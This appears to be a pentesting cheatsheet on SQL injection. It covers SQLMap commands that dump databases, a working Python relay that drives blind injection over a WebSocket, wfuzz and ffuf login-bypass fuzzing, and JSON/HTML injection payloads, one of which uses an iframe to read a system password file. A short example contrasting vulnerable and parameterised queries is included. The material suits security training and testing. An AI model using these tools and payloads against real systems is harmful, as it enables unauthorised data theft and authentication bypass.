SQL Injection

Cheatsheets

SQLMap

SQLMap can be used to detect SQL Injection.

sqlmap -u "http://<URL>/" --batch --dump --forms

SQLMap Level

  • level 1: the default

  • level 2: also tests the HTTP Cookie header

  • level 3: also tests the HTTP User-Agent and Referer headers

Automating Blind SQL injection over WebSocket with SQLMap

Here is a script that lets SQLMap drive a blind SQL injection over a WebSocket. It starts a middleware HTTP server that:

  • formats the payload if needed (for example, wraps it in JSON)

  • opens a WebSocket connection to the actual target, receives the response and extracts any token if needed

  • sends the SQLi payload and receives the output from the WebSocket

  • returns that output as the HTTP response

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse

from websocket import create_connection  # pip install websocket-client

ws_server = "ws://localhost:8156/ws"


def send_ws(payload):
    """Forward one payload to the WebSocket target and return its reply as text."""
    ws = create_connection(ws_server)
    # If the server returns a response on connect, use the line below
    # resp = ws.recv()  # e.g. find and extract a token from the connect message here

    # For our case, format the payload in JSON
    message = unquote(payload).replace('"', "'")  # replace " with ' so the JSON stays valid
    data = '{"employeeID":"%s"}' % message

    ws.send(data)
    resp = ws.recv()
    ws.close()

    if isinstance(resp, bytes):  # binary frames come back as bytes
        resp = resp.decode(errors="replace")
    return resp or ''


def middleware_server(host_port, content_type="text/plain"):

    class CustomHandler(SimpleHTTPRequestHandler):
        def do_GET(self) -> None:
            self.send_response(200)
            try:
                # Everything after the first '=' in the query string is the payload
                payload = urlparse(self.path).query.split('=', 1)[1]
            except IndexError:
                payload = ''

            if payload:
                content = send_ws(payload)
            else:
                content = 'No parameters specified!'

            self.send_header("Content-type", content_type)
            self.end_headers()
            self.wfile.write(content.encode())

    class _TCPServer(TCPServer):
        allow_reuse_address = True  # allow a quick restart on the same port

    httpd = _TCPServer(host_port, CustomHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    print("[+] Starting MiddleWare Server")
    print("[+] Send payloads in http://localhost:8081/?id=*")

    try:
        middleware_server(('0.0.0.0', 8081))
    except KeyboardInterrupt:
        pass

Start the server, then point SQLMap at the port the script listens on (8081 in the script above).

sqlmap -u "http://localhost:8081/?id=1" --batch --dbs

More information at https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

SQLmap Cheatsheet

Hacktricks: https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap

Login forms

Techniques and tools used to bypass login forms using SQL Injection. The wordlist can be found here. It is taken from HackTricks.
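To show why these bypasses work and how parameterised queries close them, here is an added example (not code from this page, HackTricks or PayloadsAllTheThings): a login check built by string formatting beside its parameterised form, both run against a constructed in-memory SQLite table with constructed inputs, one of which is a comment-based bypass string of the kind the linked wordlists contain.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite table with one account,
# so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return conn

def login_vulnerable(conn, username, password):
    # The inputs are spliced into the SQL text, so quotes and comment
    # markers inside them change the structure of the query.
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    return conn.execute(query).fetchone()[0] > 0

def login_safe(conn, username, password):
    # Parameterised query: the driver passes the inputs as values, so they
    # can never become SQL syntax, whatever characters they contain.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0

# Constructed inputs: a correct login, a wrong password, and a bypass
# string that comments out the password check (the kind of entry found
# in the login-bypass wordlists referenced above).
CASES = {
    "valid":  ("admin", "S3cret!"),
    "wrong":  ("admin", "guess"),
    "bypass": ("admin' --", "anything"),
}

def run_comparison():
    """Return {case: (vulnerable_result, safe_result)} for every input."""
    conn = make_db()
    return {name: (login_vulnerable(conn, u, p), login_safe(conn, u, p))
            for name, (u, p) in CASES.items()}

if __name__ == "__main__":
    for name, (vuln, safe) in run_comparison().items():
        print(f"{name:7s} vulnerable={vuln!s:5s} parameterised={safe}")
```

The bypass case logs in through the formatted query but not through the parameterised one, which is the check to apply when reviewing a login handler that the tools in this section flag.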

SQL Login Bypass

Hacktricks

PayloadsAllTheThings

NoSQL Login Bypass

Hacktricks

Using wfuzz

The FUZZ keyword marks the position in the request that is replaced with each wordlist entry (here, the username field).

wfuzz -c -z file,sqli.req -d "username=FUZZ&password=pass" -u "http://<IP>/login"

Useful options

  • -H: Used to set custom header

  • --hc/hl/hw/hh: Hide responses with the specified code/lines/words/chars

  • --sc/sl/sw/sh: Show responses with the specified code/lines/words/chars

  • -d: POST request data (the request body)

Using ffuf

ffuf -u http://<URL>/login -c -w sqli.req -X POST -d 'username=adminFUZZ&password=admin' -H 'Content-Type: application/x-www-form-urlencoded'

Useful options

  • -H: Used to set custom header

  • -d: POST request data (the request body)

Using SQLmap

Load a raw HTTP request from a file with the -r option.

sqlmap -r sqli.req -u "http://<URL>/login" --data "username=admin&password=pass"

JSON injection

  1. Set the Content-Type header to application/json

  2. Send a JSON payload: https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass

Any forms

JSON injection

"user":"<a href='http\\\\:someurl.com'>ACTIVATE USER HERE</a>"
"user":"<img src=https\\://dummyimage.com/200x200/ff00d5&text=HAHAHA/>"
"title":"<iframe src=file:///ect/passwd height=800px width=600px></iframe>"

JSON Injection: https://lisandre.com/archives/2286
